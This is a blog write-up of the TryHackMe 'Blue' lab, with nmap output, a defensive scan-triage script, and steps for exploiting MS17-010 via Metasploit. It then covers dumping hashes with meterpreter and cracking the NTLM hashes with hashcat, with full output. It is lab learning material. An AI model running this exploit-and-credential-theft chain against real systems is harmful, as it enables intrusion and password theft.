THM — Blue

Yikai
6 min read · Nov 21, 2020


Nmap Scan

ali@kali:~$ nmap -T4 -sC -sV 10.10.132.197
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 08:25 EST
Stats: 0:02:31 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.61% done; ETC: 08:28 (0:00:01 remaining)
Nmap scan report for 10.10.132.197
Host is up (0.37s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-11-17T13:27:15+00:00; +1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h30m00s, deviation: 3h00m00s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:83:df:b2:bb:21 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-11-17T07:27:04-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-17T13:27:04
|_ start_date: 2020-11-17T13:08:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.66 seconds
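Before moving on to exploitation, it helps to pull the defender-relevant findings out of the scan text: the open ports, the OS banner, and the two SMB signing lines. The script below is an added example, not part of the original post; it embeds a trimmed copy of the scan output above and parses it with a small line-oriented parser. The risk notes it produces are my own triage wording, not nmap output.

```python
import re

# Trimmed copy of the nmap output shown above (the page's own scan, not a
# new one), embedded so the parser runs offline.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

# "445/tcp open microsoft-ds <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# NSE script lines start with "| " or "|_ "
NSE_RE = re.compile(r"^\|_?\s*(.*)$")


def parse_nmap(text):
    """Return open ports, the SMB OS banner and both SMB signing settings."""
    result = {"ports": [], "os": None, "smb1_signing": None, "smb2_signing": None}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            if state == "open":
                result["ports"].append({"port": int(port), "proto": proto,
                                        "service": service, "version": version})
            continue
        m = NSE_RE.match(line)
        if not m:
            continue
        body = m.group(1)
        # A bare "name:" line opens a new script section ("2.02:" does not).
        if body.endswith(":") and " " not in body and body[0].isalpha():
            section = body[:-1]
            continue
        if section == "smb-os-discovery" and body.startswith("OS: "):
            result["os"] = body[len("OS: "):]
        elif section == "smb-security-mode" and body.startswith("message_signing: "):
            result["smb1_signing"] = body.split(": ", 1)[1]
        elif section == "smb2-security-mode" and body.startswith("Message signing"):
            result["smb2_signing"] = body
    return result


def triage(parsed):
    """Turn the parsed findings into the notes a defender would raise first."""
    notes = []
    ports = {p["port"] for p in parsed["ports"]}
    if 445 in ports:
        notes.append("SMB exposed on 445/tcp: verify MS17-010 patch level")
    if 3389 in ports:
        notes.append("RDP exposed on 3389/tcp: restrict to management network")
    if parsed["os"] and "Windows 7" in parsed["os"]:
        notes.append("Windows 7 is out of support (January 2020): no security updates")
    if parsed["smb1_signing"] and parsed["smb1_signing"].startswith("disabled"):
        notes.append("SMBv1 message signing disabled: relay risk, and SMBv1 should be off")
    if parsed["smb2_signing"] and "not required" in parsed["smb2_signing"]:
        notes.append("SMB2 signing not required: enforce 'RequireSecuritySignature'")
    return notes


if __name__ == "__main__":
    for note in triage(parse_nmap(SAMPLE_SCAN)):
        print("-", note)
```

The same parser works on a full `nmap -sC -sV` text report; only the sample is trimmed.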

With the title Blue, we can suspect that this box is related to the EternalBlue vulnerability.

Spin up Metasploit and search for eternalblue or ms17-010.

From the nmap scan we know that this is a Windows 7 machine.

I will be using module #2 as the exploit for this machine.

Just to be sure, let’s use module #1 to scan whether this machine is vulnerable to ms17-010.

Under options, we can see that RHOSTS is required.

RHOSTS -> 10.10.132.197

Hit run and see the results.

So now we can confirm that the target machine is vulnerable to ms17-010. Let’s carry on with using Metasploit to exploit the machine.

Let’s use the exploit with index number 2.

We need to set RHOSTS again.

Notice that LHOST is set to my own machine’s IP address instead of the THM VPN IP address. We need to change this as well.

Once all are set, we can run this exploit.

It seems the exploit failed. Double-check the options again, and the settings seem fine. I ran it again and got a shell.

If unsure what commands to use in the meterpreter shell, use $ help

$ sysinfo

With sysinfo, make sure the meterpreter session’s architecture matches the target’s architecture.

$ getuid

This command shows the user that our session is running as. From below we know that we are SYSTEM, which is equivalent to root.

Let’s try going to the root directory.

Cat flag1.txt to get the first flag.

Next, let’s use the command ps. This lists the processes that are running. Though we might be SYSTEM, the process our session lives in might not be.

It might take a couple of tries for migrate to succeed.

Now that we have migrated to a higher-privileged process, let’s run hashdump.

Let’s crack these hashes using hashcat, or you could use an online hash cracker like CrackStation.

First, create a file containing the hashes and name it whatever you want.

Use the command below to crack the hashes with hashcat.

$ hashcat -m 1000 -a 0 ./todelete.txt /usr/share/wordlists/rockyou.txt

-m sets the hash type/mode; 1000 is the mode for Windows NT (NTLM) hashes.

-a sets the attack mode; here I selected ‘0’, the straight mode that runs through a wordlist.

kali@kali:~$ hashcat -m 1000 -a 0 ./todelete.txt  /usr/share/wordlists/rockyou.txt 
hashcat (v6.0.0) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6560U CPU @ 2.20GHz, 2886/2950 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
31d6cfe0d16ae931b73c59d7e0c089c0:
ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: ./todelete.txt
Time.Started.....: Tue Nov 17 23:15:39 2020 (8 secs)
Time.Estimated...: Tue Nov 17 23:15:47 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1372.5 kH/s (0.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel
Started: Tue Nov 17 23:15:08 2020
Stopped: Tue Nov 17 23:15:48 2020

From the above we can see that Jon’s hash is cracked:

ffb43f0de35be4d9917ac0cc8ad57f8d:alqfna22

Next, let’s carry on to find the remaining flags.

Let’s look in C:\Windows\System32\config, where the SAM database that stores the users’ hashes lives.

cd there and you should see flag2.txt.

For the last flag, a cool trick I learned from John Hammond’s YouTube walkthrough is the search function of meterpreter.

Here we found the location of the last flag.

Note: sometimes I could not cd to another Windows directory when using single backslashes, but with double backslashes it works fine.


Yikai

Started my journey in cybersecurity in September 2020. This blog is used mainly to record my learning journey.